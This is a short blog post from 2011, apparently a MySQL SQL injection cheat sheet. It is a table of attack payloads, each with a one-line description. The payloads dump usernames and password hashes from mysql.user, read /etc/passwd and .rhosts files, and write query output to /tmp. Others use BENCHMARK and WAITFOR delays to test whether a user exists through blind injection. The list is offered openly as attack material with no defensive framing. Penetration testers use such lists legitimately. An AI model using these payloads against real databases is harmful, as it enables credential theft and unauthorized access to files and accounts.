| Payload | Description (if any) |
| select @@version; | View database version. |
| select host,user,db from mysql.db; | Misc. information disclosure |
| select host,user,password from mysql.user; | View MySQL usernames and passwords. |
| create table myfile (input TEXT); load data infile ‘/etc/passwd’ into table myfile; OR load data infile ‘/home/{user}/.rhosts’ into table myfile; select * from myfile; | Reading files on the filesystem. |
| select host,user,password from user into outfile ‘/tmp/passwd’; | Write files on the filesystem. This attack is limited by the fact that you can only write to either “/tmp” or “/var/tmp”. |
| select CONCAT(”a”,”b”); | Concat strings for blind SQL Injection tests. |
| BENCHMARK(1000000000,MD5(’gainingtime’)) | Cause delay for blind SQL Injection tests. |
| BENCHMARK(1000000000,MD5(CHAR(116))) | Cause delay for blind SQL Injection tests. Same as before, but this can be used if quotes are filtered. |
| IF EXISTS (SELECT * FROM users WHERE username = ‘root’) BENCHMARK(1000000000,MD5(’gainingtime’)) | Check if username exists, if yes there will be an delay. |
| IF EXISTS (SELECT * FROM users WHERE username = ‘root’) WAITFOR DELAY ‘0:0:3′ | Check if username exists, if yes there will be an delay for 3 seconds. |
Sunday, January 16, 2011
SQL injection Cheatseet
*Mysql
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment